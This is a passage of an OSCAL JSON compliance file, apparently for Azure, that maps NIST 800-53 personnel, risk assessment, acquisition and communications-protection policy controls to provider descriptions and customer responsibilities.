statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"184f8ab4-40b0-446f-8e50-5bade9ff383a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ps-1","statements":[{"uuid":"283f77d9-44c8-47fa-90ce-910293ca5254","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-001"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ps-1_smt.a","by-components":[{"uuid":"358c5e53-004b-493a-98c6-c5b118a5a0f6","export":{"provided":[{"uuid":"9d8429ca-97e0-4030-a2ae-bcbe99e2bd7b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-001"}],"description":"Azure addresses the personnel security policy as part of the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all Microsoft personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all Microsoft personnel that have a responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all with security objectives such as, Microsoft personnel with security objectives such as designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policy addresses the following: * Personnel screening * Personnel security Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The policies indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. The Azure SOPs are stored in the Azure Security, Privacy & Compliance SharePoint site. This SharePoint site is accessible to all Azure personnel. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with personnel security are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. \nThe Azure Personnel Screening Standard Operating Procedure (SOP) implements the personnel security policy and associated controls and documents the following procedures: * Background checks * References * Screening requirements Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with personnel security are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures."}],"responsibilities":[{"uuid":"0fef20d2-f03e-4a40-aab0-e3bc634b7e3e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-001"}],"description":"The customer is responsible for developing, documenting, and disseminating personnel security policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. \nThe customer is responsible for procedures to facilitate the implementation of the personnel security policy and the associated personnel security controls.","provided-uuid":"9d8429ca-97e0-4030-a2ae-bcbe99e2bd7b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"98265df5-e859-47e8-aa73-3903ba478e42","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-003"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ps-1_smt.b","by-components":[{"uuid":"bb7c0463-8c22-4d7f-974b-cedea7145aa0","export":{"provided":[{"uuid":"c4e901c6-74ab-432b-b6cc-0655774e0997","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-003"}],"description":"The Microsoft Information Risk Management Council (IRMC) organization is the governance body with approval responsibility for the Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP). The IRMC consists of representatives from security and risk management teams across Microsoft including Core Services Engineering and Operations (CSEO), Azure, and Global Security. The Customer Security and Trust: Security Engineering (CST-SE) organization manages the review and approval process and maintains the policies. On an annual basis, the CST-SE conducts a line-by-line review of the MSP and MSPP. The Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP) Governance document describes each member's role, types and frequency of review, escalation paths, approval process, and formal publishing procedures of the security policy. Throughout the year, if necessary, CST-SE may convene with the IRMC to conduct reviews after a significant review or change request. The approved policy update is published within the relevant tool on the Microsoft intranet. If service teams establish service-specific or team-specific policies, the respective service teams update the necessary policies at least annually."}],"responsibilities":[{"uuid":"1aeebe96-b4e9-4552-bbc3-86124f141696","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-003"}],"description":"The customer is responsible for designating an official to manage the development, documentation, and dissemination of personnel security planning policy and procedures.","provided-uuid":"c4e901c6-74ab-432b-b6cc-0655774e0997"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"6237beec-86e2-4a87-9199-b99f87cb7a95","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-004"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ps-1_smt.c","by-components":[{"uuid":"694a4bfe-9433-4112-899d-c293ab77b43f","export":{"provided":[{"uuid":"a13bbf1a-9b93-4032-8465-de029f0eb536","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-004"}],"description":"The Azure team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"502c2549-eaf7-457b-8085-ba8b04c931df","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-004"}],"description":"The customer is responsible for reviewing and updating the current personnel security policy on a regular basis and following organization-defined events.","provided-uuid":"a13bbf1a-9b93-4032-8465-de029f0eb536"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"ff143624-b776-4e84-b253-5647f58b4ca8","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ra-1","statements":[{"uuid":"43338c5d-f380-43f8-97d8-5e59cd10aa49","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-001"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ra-1_smt.a","by-components":[{"uuid":"23925727-7d99-480a-8093-f10091d1d2fe","export":{"provided":[{"uuid":"15e2106b-415e-4864-adbd-c3cef7a9d8ed","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-001"}],"description":"Azure addresses the risk assessment policy as part of the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all personnel that have a responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all personnel involved in designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policy addresses the following: Azure addresses the risk assessment policy as part of the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all Microsoft personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all Microsoft personnel that have a responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all Microsoft personnel with security objectives such as designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policy addresses the following: * Organizational Risk Assessment * Compliance Framework Management Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The standards indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. The Azure SOPs are stored in the Azure Security, Privacy & Compliance SharePoint site. This SharePoint site is accessible to all Azure personnel. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with risk assessment are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. \nThe Azure Risk and Exception Management Standard Operating Procedure (SOP) implements the risk assessment policy and associated controls and documents the following procedures: * Risk Assessment Approach * Risk Assessment Methodology * System Categorization * System Threat Environment * Risk Assessment Results Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with risk assessment are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures."}],"responsibilities":[{"uuid":"50539da0-5438-40b2-955a-5d6b3e5e8715","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-001"}],"description":"The customer is responsible for developing, documenting, and disseminating risk assessment policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. \nThe customer is responsible for procedures to facilitate the implementation of the risk assessment policy and the associated risk assessment controls.","provided-uuid":"15e2106b-415e-4864-adbd-c3cef7a9d8ed"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"719e8b56-b3f5-43e9-8689-99bb7db2b4e9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-003"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ra-1_smt.b","by-components":[{"uuid":"b37ac208-191e-444f-9371-fa9048c2ed76","export":{"provided":[{"uuid":"c08fe64e-15c5-47ae-a330-c8e6f1566537","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-003"}],"description":"The Microsoft Information Risk Management Council (IRMC) organization is the governance body with approval responsibility for the Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP). The IRMC consists of representatives from security and risk management teams across Microsoft including Core Services Engineering and Operations (CSEO), Azure, and Global Security. The Customer Security and Trust: Security Engineering (CST-SE) organization manages the review and approval process and maintains the policies. On an annual basis, the CST-SE conducts a line-by-line review of the MSP and MSPP. The Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP) Governance document describes each member's role, types and frequency of review, escalation paths, approval process, and formal publishing procedures of the security policy. Throughout the year, if necessary, CST-SE may convene with the IRMC to conduct reviews after a significant review or change request. The approved policy update is published within the relevant tool on the Microsoft intranet. If service teams establish service-specific or team-specific policies, the respective service teams update the necessary policies at least annually."}],"responsibilities":[{"uuid":"b21420fd-d9cb-4235-abed-918262ec43c5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-003"}],"description":"The customer is responsible for designating an official to manage the development, documentation, and dissemination of the risk assessment policy and procedures.","provided-uuid":"c08fe64e-15c5-47ae-a330-c8e6f1566537"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"830b8155-b207-4876-9d01-1e73320d1326","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-004"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ra-1_smt.c","by-components":[{"uuid":"e209649d-8996-4011-b7ff-278b2322463d","export":{"provided":[{"uuid":"5e6911ee-0602-461c-84c7-2ac715a99a8d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-004"}],"description":"The Azure team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"d46f6670-a026-49df-ba25-ea0f99fe73f7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-004"}],"description":"The customer is responsible for reviewing and updating the current risk assessment policy on a regular basis and following organization defined events.","provided-uuid":"5e6911ee-0602-461c-84c7-2ac715a99a8d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"bc323a6b-c765-46ca-869c-95041652e203","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-1","statements":[{"uuid":"66ad086b-f1d0-497a-bf76-c4b58079ca35","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-001"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"sa-1_smt.a","by-components":[{"uuid":"283592cf-034c-4f0f-a322-3a914d526956","export":{"provided":[{"uuid":"1c08b238-8533-44c9-9271-8f10721fa69c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-001"}],"description":"Azure addresses the system and services acquisition policy as part of the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all Microsoft personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all Microsoft personnel that have a responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all Microsoft personnel with security objectives such as designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policy addresses the following: * Ownership of third-party relationships * Security Development Lifecycle (SDL) * Introduction of new hardware, software, or services Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The policies indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. The Azure SOPs are stored in the Azure Security, Privacy & Compliance SharePoint site. This SharePoint site is accessible to all Azure personnel. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with system and services acquisition are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. \nTo meet controls for system and services acquisition, Azure maintains teams with responsibilities to procure professional services, review contracts to Microsoft corporate standards, and procure assets for the delivery of Azure services. Multiple standards, processes, and SOPs are maintained by individual Azure teams to support the implementation and adherence to the MSPP section on Supplier Relationships. Microsoft system and services procurement activities are managed through a company-wide team. All external suppliers of services or systems must be approved by the Global Procurement Group (GPG) and have a signed contract and Master Supplier Services Agreement (MSSA) on file. The contract includes sections outlining security requirements and service level monitoring to be enforced. GPG requires the external suppliers of services to comply with all applicable Microsoft security policies and implement security procedures to prevent disclosure of Microsoft Confidential information. Microsoft includes provisions in the MSSA and any associated Statements of Work (SOW) with each vendor addressing the need to employ appropriate security controls. Additionally, vendors that handle high business impact data must be in annual compliance with the Microsoft Supplier Security and Privacy Assurance (SSPA) Program Guide. Statements of Work (SOW) and Purchase Orders (PO) can only be submitted for suppliers who have approved contracts. The GPG team as well as Microsoft's Corporate, External, and Legal Affairs (CELA) review these documents before being approved. These materials are formally documented and stored within each team's internal Azure SharePoint site as a central repository. Only individuals with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles/responsibilities are given access to the material."}],"responsibilities":[{"uuid":"d0b7d6cc-a425-4696-bef5-e279119c2f81","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-001"}],"description":"The customer is responsible for developing, documenting, and disseminating system and services acquisition policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. \nThe customer is responsible for procedures to facilitate the implementation of system and services acquisition policy and the associated system and services acquisition controls.","provided-uuid":"1c08b238-8533-44c9-9271-8f10721fa69c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"44d5c05b-0f67-4e0e-98cd-7772dc2d91cd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-003"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"sa-1_smt.b","by-components":[{"uuid":"996a4d24-1b0d-4b8c-a565-f3cbdec2aa08","export":{"provided":[{"uuid":"f9f55224-13f7-485f-ad70-18818437efd4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-003"}],"description":"The Microsoft Information Risk Management Council (IRMC) organization is the governance body with approval responsibility for the Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP). The IRMC consists of representatives from security and risk management teams across Microsoft including Core Services Engineering and Operations (CSEO), Azure, and Global Security. The Customer Security and Trust: Security Engineering (CST-SE) organization manages the review and approval process and maintains the policies. On an annual basis, the CST-SE conducts a line-by-line review of the MSP and MSPP. The Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP) Governance document describes each member's role, types and frequency of review, escalation paths, approval process, and formal publishing procedures of the security policy. Throughout the year, if necessary, CST-SE may convene with the IRMC to conduct reviews after a significant review or change request. The approved policy update is published within the relevant tool on the Microsoft intranet. If service teams establish service-specific or team-specific policies, the respective service teams update the necessary policies at least annually."}],"responsibilities":[{"uuid":"62941775-5fc4-4aaa-8774-86a89c34914d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-003"}],"description":"The customer is responsible for designating an official to manage the development, documentation, and dissemination of the system and services acquisition policy and procedures.","provided-uuid":"f9f55224-13f7-485f-ad70-18818437efd4"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"11e3ea2b-64a6-484d-a2f4-552f46b8abc4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-004"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"sa-1_smt.c","by-components":[{"uuid":"cfa636f9-8a8e-4374-a5fe-8dd17cd3b955","export":{"provided":[{"uuid":"ba618bbc-d50e-436e-914a-abae5c98c4ff","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-004"}],"description":"The Azure team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"df4d2cfa-20ad-4ab2-b2fa-7a4ce4a5646d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-004"}],"description":"The customer is responsible for reviewing and updating the system and services acquisition procedures on a regular basis and following organization defined events.","provided-uuid":"ba618bbc-d50e-436e-914a-abae5c98c4ff"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"c7c1c992-f0a2-4771-b0de-76ad8b7070a9","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-1","statements":[{"uuid":"d2e79be0-6063-47e0-b981-465f27588644","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-001"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"sc-1_smt.a","by-components":[{"uuid":"0217737f-0290-423c-adf8-da00df26596c","export":{"provided":[{"uuid":"2b3d8cbb-d781-449d-a431-76af91eb495a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-001"}],"description":"Azure addresses the Microsoft-level system and communications policies as part of the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all Microsoft personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all Microsoft personnel that have a responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all Microsoft personnel with security objectives such as designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policies address the following: * Communications security * Communications across networks * Secure communications channels * Network design Additionally, the policies address the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide levels of support to all services. The policies indicate Microsoft management's commitment and are a critical component of the Microsoft risk management strategy, providing Azure personnel with a current set of clear and concise information security requirements. These policies are consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines currently applicable to Microsoft and Azure. Service teams may supplement the Microsoft and Azure policies and procedures with service-specific policies and procedures. Service-specific policies and procedures associated with system and communications are documented and stored within internal service team SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-specific policies or procedures. \nC+AI Security publishes additional standard operating procedures (SOPs) and Security Standards that facilitate and support the implementation of systems and communications protection controls in Azure. These SOPs and standards include: * Azure Access Control Standard Operating Procedure (SOP) * Azure Asset Management Standard Operating Procedure (SOP) * Azure Cryptographic Control Standard Operating Procedure (SOP) * Key Management Standard * Asset Classification Standard * Asset Protection Standard Service teams may supplement the Microsoft and Azure policies and procedures with service-specific policies and procedures. Service-specific policies and procedures associated with system and communications are documented and stored within internal service team SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-specific policies or procedures."}],"responsibilities":[{"uuid":"1bbdf7f7-07e4-41f0-b1d3-3eedf5fceaf1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-001"}],"description":"The customer is responsible for developing, documenting, and disseminating system and communications protection policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. \nThe customer is responsible for procedures to facilitate the implementation of the system and communications protection policy and the associated system and communications protection controls.","provided-uuid":"2b3d8cbb-d781-449d-a431-76af91eb495a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"90c0b0e4-6c82-4d63-b4a7-b272d8f55af0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-003"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"sc-1_smt.b","by-components":[{"uuid":"5160881f-7dc5-49df-b2d2-6fb0d3644723","export":{"provided":[{"uuid":"560baef7-68d4-4e66-b852-272514760f16","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-003"}],"description":"The Microsoft Information Risk Management Council (IRMC) organization is the governance body with approval responsibility for the Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP). The IRMC consists of representatives from security and risk management teams across Microsoft including Core Services Engineering and Operations (CSEO), Azure, and Global Security. The Customer Security and Trust: Security Engineering (CST-SE) organization manages the review and approval process and maintains the policies. On an annual basis, the CST-SE conducts a line-by-line review of the MSP and MSPP. The Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP) Governance document describes each member's role, types and frequency of review, escalation paths, approval process, and formal publishing procedures of the security policy. Throughout the year, if necessary, CST-SE may convene with the IRMC to conduct reviews after a significant review or change request. The approved policy update is published within the relevant tool on the Microsoft intranet. If service teams establish service-specific or team-specific policies, the respective service teams update the necessary policies at least annually."}],"responsibilities":[{"uuid":"dd85ea9b-6f65-4d62-b494-7696a95e2d1c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-003"}],"description":"The customer is responsible for designating an official to manage the development, documentation, and dissemination of system and communications protection policy and procedures.","provided-uuid":"560baef7-68d4-4e66-b852-272514760f16"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"54fdbae0-4b19-43d5-a465-b0898674fb43","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-004"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"sc-1_smt.c","by-components":[{"uuid":"5f083231-0807-49ec-a511-257126f66785","export":{"provided":[{"uuid":"f04aa943-de30-438f-895d-b93e87dd8b62","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-004"}],"description":"The Azure team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"a587d325-dc6f-4086-8bac-9abee5534d37","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-004"}],"description":"The customer is responsible for reviewing and updating the current system and communications policy on a regular basis and following organization defined events.","provided-uuid":"f04aa943-de30-438f-895d-b93e87dd8b62"}]},"description":"See inheritance and customer responsibility 